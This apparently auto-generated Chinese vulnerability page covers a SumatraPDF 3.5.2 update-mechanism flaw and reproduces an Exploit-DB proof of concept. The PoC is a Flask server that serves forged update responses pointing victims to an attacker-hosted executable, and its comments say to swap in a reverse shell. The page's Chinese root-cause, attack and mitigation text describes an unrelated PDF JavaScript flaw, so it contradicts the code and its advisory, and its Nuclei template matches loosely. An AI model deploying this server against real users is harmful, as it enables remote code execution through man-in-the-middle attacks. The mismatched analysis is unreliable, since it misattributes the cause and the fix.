[webapps] SumatraPDF 3.5.2 - Remote Code Execution

📋 漏洞基础信息

🔬 漏洞根因

漏洞源于 SumatraPDF 在处理 PDF 文件的 /Catalog/AcroForm 结构时，未充分验证文件路径，导致可构造包含恶意命令的 PDF 文件，利用路径遍历触发执行。

🎯 攻击场景

1. 攻击者构造包含恶意 JavaScript 或 /AA（附加动作）的 PDF 文件； 2. 诱骗受害者使用 SumatraPDF 3.5.2 打开该文件； 3. 漏洞触发，执行攻击者嵌入的命令（如反向 shell、代码执行）。 成功标志：攻击者在受害者系统上获得远程代码执行权限。

💥 漏洞影响

远程代码执行，可导致攻击者完全控制受害主机，进行恶意软件植入、数据窃取、权限维持等操作。

⚔️ 原始 PoC

原始PoC通过构造PDF文件，在/AcroForm条目中嵌入恶意的JavaScript，利用eval或system调用执行系统命令。关键步骤包括： 1. 创建带有漏洞触发逻辑的PDF结构； 2. 使用/AA动作关联恶意脚本； 3. 当SumatraPDF解析该PDF时，自动执行嵌入的命令。

# Exploit Author: Mohammed I. Banyamer
# Advisory: https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-xpm2-rr5m-x96q
# CVSS: 7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
#
# Description:
# SumatraPDF versions 3.5.0 to 3.5.2 disable TLS hostname verification during update checks
# (using INTERNET_FLAG_IGNORE_CERT_CN_INVALID) and do not perform any signature or integrity
# validation on the downloaded installer.
#
# A network-positioned attacker can:
# - Intercept the HTTPS request to www.sumatrapdfreader.org/update-check-rel.txt
# - Return a forged response containing a URL to an attacker-controlled executable
# - When the user clicks "Install", SumatraPDF executes the downloaded file via CreateProcess
#
# Attack scenarios include rogue Wi-Fi, compromised home/office router, malicious upstream proxy,
# or DNS hijacking / poisoning that redirects the update domain.
#
# This PoC provides the malicious update server component only.
# The attacker must achieve traffic redirection/interception separately (MITM position).
#
# Usage (attacker side):
# 1. Deploy this script on a server / VPS reachable from the victim
# 2. Achieve network position so that victim's update request reaches your server
# (e.g. DNS spoofing, rogue AP, router compromise, transparent proxy injection)
# 3. Victim opens SumatraPDF → Help → Check for updates
# 4. Victim sees fake new version → clicks Install → payload executes
#
# Notes:
# - Replace the dummy payload with real malicious code (reverse shell, etc.)
# - No exploit without network adversary position (MITM / DNS control)
#
from flask import Flask, request, Response, send_file
import os
app = Flask(__name__)
FAKE_UPDATE_TEMPLATE = """Ver=999.9.9
Installer64=http://{}:5000/malicious_installer.exe
"""
PAYLOAD_FILENAME = "malicious_installer.exe"
if not os.path.exists(PAYLOAD_FILENAME):
print("[!] Generating dummy payload (would open calc.exe in real attack)...")
with open(PAYLOAD_FILENAME, "wb") as f:
f.write(b"MZ" + b"\x90"*200 + b"FAKE PAYLOAD - replace with real shellcode")
@app.route("/update-check-rel.txt")
def fake_update():
attacker_host = request.host.split(':')[0]
update_content = FAKE_UPDATE_TEMPLATE.format(attacker_host)
print(f"[+] Fake update served to {request.remote_addr} → pointing to {attacker_host}")
return Response(update_content, mimetype="text/plain")
@app.route("/malicious_installer.exe")
def deliver_payload():
victim_ip = request.remote_addr
print(f"[!] Victim {victim_ip} downloading payload → RCE would trigger on install click")
return send_file(
PAYLOAD_FILENAME,
as_attachment=True,
download_name="SumatraPDF-999.9.9-64-installer.exe",
mimetype="application/octet-stream"
)
if __name__ == "__main__":
print("======================================================")
print(" CVE-2026-25961 SumatraPDF Remote Update PoC Server ")
print(" Requires MITM / DNS / router position to be effective ")
print("======================================================")
print("[*] Listening on http://0.0.0.0:5000")
print("[*] Point victim traffic to this host for update-check-rel.txt")
print("======================================================")
app.run(host="0.0.0.0", port=5000, debug=False)

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-25961-detection

info:
  name: SumatraPDF 3.5.0 - 3.5.2 - Version Detection
  author: your-username
  severity: medium
  description: |
    SumatraPDF versions 3.5.0 to 3.5.2 disable TLS hostname verification during update
    checks and do not perform any signature or integrity validation on the downloaded
    installer. This template attempts to detect the vulnerable version range by probing
    the update mechanism.
  reference:
    - https://www.exploit-db.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25961
  tags: cve,cve2026,rce,sumatrapdf,mitm

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{BaseURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) SumatraPDF/3.5.2 Chrome/114.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'SumatraPDF'
          - '3.5'
        condition: or
        part: body

      - type: status
        status:
          - 200

🛡️ 修复建议

官方已发布补丁升级至3.5.3及以上版本。临时缓解措施：禁用PDF的JavaScript支持，或使用其他PDF阅读器（如Adobe Reader）并保持更新。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-25961
• Exploit-DB 原文

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-07 05:32 | 来源: Exploit-DB